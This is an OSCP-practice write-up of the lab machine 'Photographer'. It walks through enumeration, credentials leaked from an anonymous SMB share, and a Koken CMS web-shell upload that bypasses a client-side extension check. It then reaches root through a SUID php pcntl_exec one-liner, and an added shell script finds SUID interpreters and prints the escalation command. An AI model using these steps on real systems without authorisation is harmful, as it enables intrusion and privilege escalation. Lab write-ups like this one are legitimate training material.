PGP Target Photographer
After thinking about it for a long time, I have decided to publish the English version of this report for everyone's reference. Passing OSCP requires an English report, and you will not pass without practising English, so most of my future reports will be written in English. They use only simple words, nothing beyond primary-school level. Any fellow coders who know English are very welcome to point out my grammar mistakes.
It has been a few days since I last wrote anything about my OSCP practice, so today I have decided to write two posts about what I have been doing.
Enum
Nmap showed the machine serving SSH, a web server on port 80, SMB, and another web service on port 8000.
Port 80
The index page was a plain static HTML site with little worth testing. I ran dirsearch against it as well, but found nothing apart from a pile of useless JS files.
Ports 445 & 139
I tried a new (to me) SMB scanner, enum4linux, which turned out to be easy to use.
enum4linux 192.168.248.76
It reported that the SMB server allowed anonymous login with no password, and it also listed an SMB share path.
So I logged in with smbclient and looked for anything useful in the share.
The share contained a mail backup, and it gave me some important information: the name Daisa, the address daisa@photographer.com, and the phrase "my babygirl :)".
Port 8000
This was a Koken CMS, and searchsploit listed a file-upload exploit for it.
To use it I first had to find the login panel and log in, because the upload is only reachable after authentication.
So I ran dirsearch again and found the /admin path.
Now let's start hacking.
Shell as www
First, I logged in with daisa@photographer.com:babygirl and found the "Import content" button mentioned in the exploit.
I uploaded a PHP web shell with a .jpg extension, intercepted the upload request in Burp Suite, and changed the filename back to .php. The server accepted the renamed file, so whatever extension check existed lived in the browser, not on the server.
That gave me a shell as www.
Shell as root
Searching for SUID binaries, I found that php had the SUID bit set, which makes a root shell trivial to obtain:
php -r "pcntl_exec('/bin/sh', ['-p']);"
And once again I had a root shell. The -p flag asks the shell to keep its effective UID (root) instead of dropping back to the real UID of www.
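As an added example (not code from the original writeup), the following POSIX shell script performs the SUID search described above and flags interpreters such as php that hand out a root shell the moment they are SUID. The list of dangerous interpreters, the optional root-directory argument and the helper names are assumptions made for illustration; the php escalation line it prints is the same GTFOBins-style command used on the box.

```shell
#!/bin/sh
# Added example, not from the original writeup: enumerate SUID binaries and flag
# interpreters that give a low-privilege user an instant root shell, as php did here.
# Usage: find_suid_interpreters [ROOT_DIR]   (ROOT_DIR defaults to /)

# Interpreters and utilities that are trivially abusable when SUID (assumed list).
SUID_INTERPRETERS="php php7.2 php7.4 php8.1 python python2 python3 perl ruby node lua bash find vim nmap"

# List every SUID regular file under ROOT_DIR, one path per line.
list_suid() {
    root="${1:-/}"
    find "$root" -xdev -type f -perm -4000 2>/dev/null
}

# Print only those SUID files whose basename appears in SUID_INTERPRETERS.
find_suid_interpreters() {
    list_suid "$1" | while IFS= read -r path; do
        name=$(basename "$path")
        for bad in $SUID_INTERPRETERS; do
            if [ "$name" = "$bad" ]; then
                printf '%s\n' "$path"
                break
            fi
        done
    done
}

# Hardening check: return 0 when no dangerous SUID interpreter exists, 1 otherwise.
check_suid_interpreters() {
    hits=$(find_suid_interpreters "$1")
    if [ -n "$hits" ]; then
        printf 'dangerous SUID interpreter(s) found:\n%s\n' "$hits" >&2
        return 1
    fi
    return 0
}

# Build the escalation command for a flagged binary (php only, mirroring the box).
# -p asks the spawned shell to keep the effective UID instead of dropping it.
escalation_cmd() {
    case "$(basename "$1")" in
        php*) printf '%s -r "pcntl_exec(%s, [%s]);"\n' "$1" "'/bin/sh'" "'-p'" ;;
        *) return 1 ;;
    esac
}
```

Run it on a target as `check_suid_interpreters` for a quick yes/no, or `find_suid_interpreters` to see the paths; when php is flagged, `escalation_cmd /usr/bin/php7.2` prints the exact one-liner used above. The php route only works if the pcntl extension is compiled in, as it was on this machine.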
After root
While browsing the site on port 8000, every page took more than 30 seconds to load because the site pulls resources from the Google CDN to speed things up, and Google is not reachable from China. If you have the same problem, I suggest the Chrome extension justjavac/ReplaceGoogleCDN (github.com), which rewrites Google CDN URLs to mirrors inside China.